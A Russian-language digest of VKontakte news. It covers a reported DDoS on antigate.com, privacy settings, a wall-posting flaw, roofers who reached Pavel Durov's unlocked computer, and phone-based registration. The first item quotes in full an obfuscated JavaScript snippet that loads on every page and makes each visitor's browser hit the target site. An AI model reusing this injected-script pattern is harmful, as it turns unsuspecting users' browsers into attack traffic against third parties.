Социальная сеть «ВКонтакте» внедрила на все страницы сайта сценарий, осуществляющий DDoS атаку на сайт antigate.com.

Сегодня многие пользователи ВКонтакте, посетившие сайт социальной сети, могли стать невольными участниками DDoS атаки на сайт antigate.com.

На страницах пользователей загружался следующий javascript сценарий:

function _test() {
  var fr=utilsNode.appendChild(ce('iframe')),d=fr.contentWindow.document;d.open();d.write(' <script>this.location="http://ant'+'iga'+'te.com/i '+'n.php?'+'firs'+'t_an'+'d_la'+'st_wa'+'rnin'+ 'g=o'+'n";</sc'+'ript>');setTimeout(re.pbind(fr),1000);
}

<body onresize="onBodyResize()" class="is_rtl font_default" onload="_test()"> 

Этот сценарий отправлял запрос на сайт antigate.com из браузера каждого пользователя соцсети «ВКонтакте» при каждой загрузке страницы.

Подобные действия со стороны администрации «ВКонтакте» не могут радовать, и невольно поднимается вопрос о моральности и законности (ст. 274 УК РФ) подобных действий.

securitylab

Администрация социальной сети «Вконтакте» позволила пользователям заблокировать индексацию их личных профилей поисковыми системами. Помимо этого, пользователи также смогут скрыть свою учетную запись от внутреннего поиска социальной сети.

Таким образом, пользователям предлагают настройки приватности в двух вариантах: «недоступна внешним поисковым службам» и «недоступна «Вконтакте» и внешним службам». Администрация социальной сети отмечает, что информация с учетной записи пользователя может еще в течение месяца появляться в поисковой выдаче. Это связанно с тем, что поисковые системы определенное время хранят информацию о проиндексированных сайтах.

Напомним, что впервые учетные записи пользователей «Вконтакте» появились в поисковой выдаче в декабре 2010 года. На то время, «Вконтакте» заключила договор с «Яндексом», согласно которому поисковая система индексировала всю открытую пользователями информацию учетной записи.

Позже администрация социальной сети сделала часть информации на странице пользователей общедоступной. В феврале 2011 года было запрещено скрывать стену, а через несколько месяцев доступными для просмотра стали и списки друзей пользователей.

Такие изменения были негативно восприняты пользователями. В результате, администрация «Вконтакте» ввела списки «тайных друзей», не отображающихся на странице пользователя.

Неизвестные хакеры обнаружили уязвимость в социальной сети «ВКонтакте». Первой и, по всей вероятности единственной, жертвой этой уязвимости стал основной владелец сервиса Павел Дуров. На протяжении часа на личной странице Дурова появлялись видеозаписи с подписью типа: «Паша привет. От Витьки и Женьки».

В воскресенье 18 сентября на странице владельца социальной сети появился комментарий: «Обнаружили уязвимость при добавлении видеозаписей в статус: короткое время можно было публиковать видеозаписи с подписью на чужие стены от имени владельца страницы. Уязвимость устранена, благодарим за помощь нашедших».

Некоторые аналитики считают, что уязвимость появилась после обновления функционала восстановления страниц. Администрация «ВКонтакте» устранила уязвимость сразу после того, как была обнаружена ее эксплуатация.

В ночь с 27 на 28 августа была взломана личная страница Павла Дурова на сайте ВКонтакте. На «стене» личной страницы Павла Дурова появилась надпись "кавесру кавесру кавесру", также изменился статус Павла на "танк пв руферы привет лодка девочка и ко".

«Хакерами» оказались дети, называющие себя руферами - теми, кто лазит по крышам в свое удовольствие. Они без проблем смогли проникнуть через крышу в Дом Книги в Санкт-Петербурге, где в настоящий момент располагается офис социальной сети «ВКонтакте». Ребята сделали подробный фотоотчет и выложили его в интернете.

"Весь поход занял чуть больше получаса. Минут 20 посидели в стеклянном шаре, что наверху стеклянного купола, минут пять побыли в самом куполе. Далее пошли через кабинет Павла, вышли на крышу и ушли. Успели побывать в комнате разработчиков не более минуты. Когда загрузили компьютер Павла, на рабочем столе было несколько ярлыков. Операционная система Windows 7, браузер Google Chrome. Введя адрес vk.com, сразу попали на страницу Павла. За компьютером провели не более двух минут. Оставили запись, сменили статус и ушли. У Павла тысячи заявок в друзья и непрочитанных личных сообщений".

Что же получается и какой вывод из этого можно сделать?

В Доме Книги явные проблемы с охраной. Мало того, что кто угодно может проникнуть в здание, так еще и могут попасть в любые кабинеты.
Явные проблемы с безопасностью внутри компании «ВКонтакте», мало того, что любой желающий может попасть в кабинет руководителя, так еще и доступ к компьютеру не защищен паролем.

Сервис «ВКонтакте» в очередной раз изменил правила регистрации. Для создания новой учетной записи, пользователь должен нажать на кнопку «Получить приглашение», после чего ему будет предложено ввести регистрационные данные. В пресс-релизе социальной сети говорится, что «ВКонтакте» не вернулась к прежней системе, которая действовала до введения регистрации по приглашениям, а лишь усовершенствовала нынешнюю.

«Для создания нового профиля необходимо привязать его к номеру мобильного телефона, который ранее не использовался для аналогичных целей. Указанный номер и будет логином, который участнику сети необходимо вводить при авторизации», — говорится в сообщении.

Администрация «ВКонтакте» полностью отказалась привязки учетных записей к адресам электронной почты. Таким образом, социальная сеть пытается защитить от пользователей от спама и повысить степень защиты их профилей.

«После введения регистрации по приглашениям мы столкнулись с тем, что многие иностранные пользователи и некоторые жители России не могли получить приглашение на наш сайт. Нам приходилось обрабатывать большой объем заявок вручную. Новая же система — компромисс между открытой регистрацией и закрытой системой», — заявил глава пресс-службы «ВКонтакте» Владислав Цыплухин.